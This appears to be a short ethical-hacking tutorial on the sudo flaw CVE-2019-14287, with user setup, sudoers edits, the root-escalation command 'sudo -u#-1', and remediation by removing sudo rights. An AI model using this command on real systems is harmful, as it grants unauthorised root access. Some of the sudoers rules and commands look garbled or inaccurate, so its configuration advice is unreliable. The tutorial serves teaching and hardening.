Ethical Hacking

CVE-2019-14287 Linux sudo escalation of privileges

CVE-2019-14287 - Linux sudo escalation of privileges


Create User and make sure they're able to login

Setup for login and execute tasks:

First you would have created a user:

useradd -m bob -G sudo -s /bin/bash
passwd bob

Being able to login you add to .profile (on top)
vi .profile

check who's in sudo with:

groups sudo
groups bob



Edit the file sudoers

vi /etc/sudoers


vi etc sudoers




Because bob is member of sudo he can perform Administrative tasks.




2. Prevent partially user privilege specification

This doesn't help too much because of the flaw.

myhost operators =(ALL,!root) !ALL




To check which user executes this:
sudo -u#-1 id 0

To execute a command as root:

su root leafpad
cannot be executed because of that rule.

or with the user password it can be executed like this:

sudo -u#-1 leafpad




3. Remediation and Check Group Membership

You could add another line like this:

%sudo ALL=(ALL:!operator) !ALL




The result is, that Bob cannot perform Administrative tasks anymore.





But to not use this strange setup as all, you just need to make sure Bob doesn't have sudo rights.

groups root
groups bob

Set default group for Bob
sudo usermod -a -G operator bob
groups bob
gpasswd -d bob sudo
groups bob




Result: Bob is no longer a member of sudo and cannot perform Administrative tasks and is just an operator.


Hardened Execuction - Least privilged




As you can see it's wizer to not give the users sudo rights.

And this is history when you update your Linux system.


Thank you for reading.




Related Articles

Articles (US)